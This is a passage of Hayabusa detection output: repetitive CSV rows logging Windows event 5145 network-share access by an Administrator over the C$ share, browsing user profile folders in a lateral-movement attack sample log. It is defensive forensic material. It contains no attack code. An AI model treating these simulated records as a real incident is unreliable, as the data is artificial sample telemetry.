+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 